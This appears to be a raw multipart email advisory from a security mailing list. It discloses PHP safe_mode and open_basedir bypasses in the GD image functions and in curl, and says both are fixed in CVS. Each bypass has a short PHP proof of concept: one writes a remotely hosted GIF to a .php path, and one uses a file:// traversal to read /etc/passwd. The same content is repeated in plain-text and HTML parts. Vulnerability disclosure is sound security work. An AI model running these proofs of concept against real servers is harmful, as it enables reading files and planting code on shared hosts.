------=_Part_12857_14117620.1129582526565
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

There is a vulnerability (Safedir Restriction Bypass) identified within the
GD extension affecting
the following functions:
- imagegif()
- imagepng()
- imagejpeg()

in /ext/gd/gd.c line 1647

Which is now fixed in the cvs
http://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=3D1.312.2.1#1786
POC:

with an image like http://81.57.125.106/~slythers/file.gif
<?php
$im =3D imagecreatefromgif("file.gif");
imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
?>


curl openbasedir and safemode bypass.
POC:

<?php

mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch =3D curl_init("
file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../et=
c/passwd
");

$file=3Dcurl_exec($ch);

echo $file;

?>
As you notice, we can bypass the safedir which leads to access to any
files on any shared servers.

This is fixed in the cvs.
 slythers@gmail.com
greets: david coallier <davidc@php.net>

------=_Part_12857_14117620.1129582526565
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

<div>There is a vulnerability (Safedir Restriction Bypass)&nbsp;identified =
within the GD extension affecting<br>the following functions:<br>- imagegif=
()<br>- imagepng()<br>- imagejpeg()<br><br>in /ext/gd/gd.c &nbsp;line 1647<=
br><br>
Which is now fixed in the cvs<br><span class=3D"q"><a onclick=3D"return top=
.js.OpenExtLink(window,event,this)" href=3D"http://cvs.php.net/co.php/php-s=
rc/ext/gd/gd.c?r=3D1.312.2.1#1786" target=3D"_blank">http://cvs.php.net/co.=
php/php-src/ext/gd/gd.c?r=3D1.312.2.1#1786
</a><br></span><span class=3D"q">POC:</span></div>
<div><span class=3D"q"><br></span><span></span>with an image like <a onclic=
k=3D"return top.js.OpenExtLink(window,event,this)" href=3D"http://81.57.125=
.106/~slythers/file.gif" target=3D"_blank">http://81.57.125.106/~slythers/f=
ile.gif
</a><br>&lt;?php<br><span class=3D"q">&nbsp; &nbsp; $im =3D imagecreatefrom=
gif(&quot;file.gif&quot;);<br>&nbsp; &nbsp; imagegif($im, '/var/www/f34r.fr=
/c/f/elbossoso/.i.need.money.php');<br>?&gt;<br><br><br></span>curl openbas=
edir and safemode bypass.
<br><span class=3D"q">POC:</span></div><span class=3D"q">
<div><br></div></span><span>
<p>&lt;?php</p>
<p>mkdir(&quot;./&quot;.$_SERVER[&quot;SCRIPT_NAME&quot;].&quot;?&quot;);<b=
r>$ch =3D curl_init(&quot;<a href=3D"file://&quot;.$_SERVER[&quot;SCRIPT_FI=
LENAME&quot;].&quot;?/../../../../../../../../../../../etc/passwd">file://&=
quot;.$_SERVER[&quot;SCRIPT_FILENAME&quot;].&quot;?/../../../../../../../..=
/../../../etc/passwd
</a>&quot;);</p>
<p>$file=3Dcurl_exec($ch);</p>
<p>echo $file;</p>
<p>?&gt;</p></span>
<div>As you notice, we can bypass the <span class=3D"st0" id=3D"st" name=3D=
"st">safedir</span> which leads to access to any<br>files on any shared ser=
vers.<br><br>This is fixed in the cvs.<br>&nbsp;</div>
<div><a href=3D"mailto:slythers@gmail.com">slythers@gmail.com</a></div>
<div>greets: david coallier &lt;<a href=3D"mailto:davidc@php.net">davidc@ph=
p.net</a>&gt;</div>

------=_Part_12857_14117620.1129582526565--